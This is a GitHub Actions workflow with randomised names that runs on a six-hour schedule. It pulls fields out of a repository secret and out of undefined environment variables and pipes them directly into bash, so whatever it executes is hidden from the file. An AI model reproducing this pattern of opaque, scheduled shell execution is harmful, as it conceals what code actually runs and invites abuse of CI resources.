name: dingdude8761

on:
  workflow_dispatch:
  schedule:
    - cron: '1 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dingdude8761
        env:
          lj936: ${{ secrets.lj936 }}
        run: |
          echo $lj936 | jq -r .dyzl43400 | /bin/bash
          echo $hzyfp55592 | jq -r .aj8435 | /bin/bash
          echo $p4 | jq -r .nidgv70 | /bin/bash

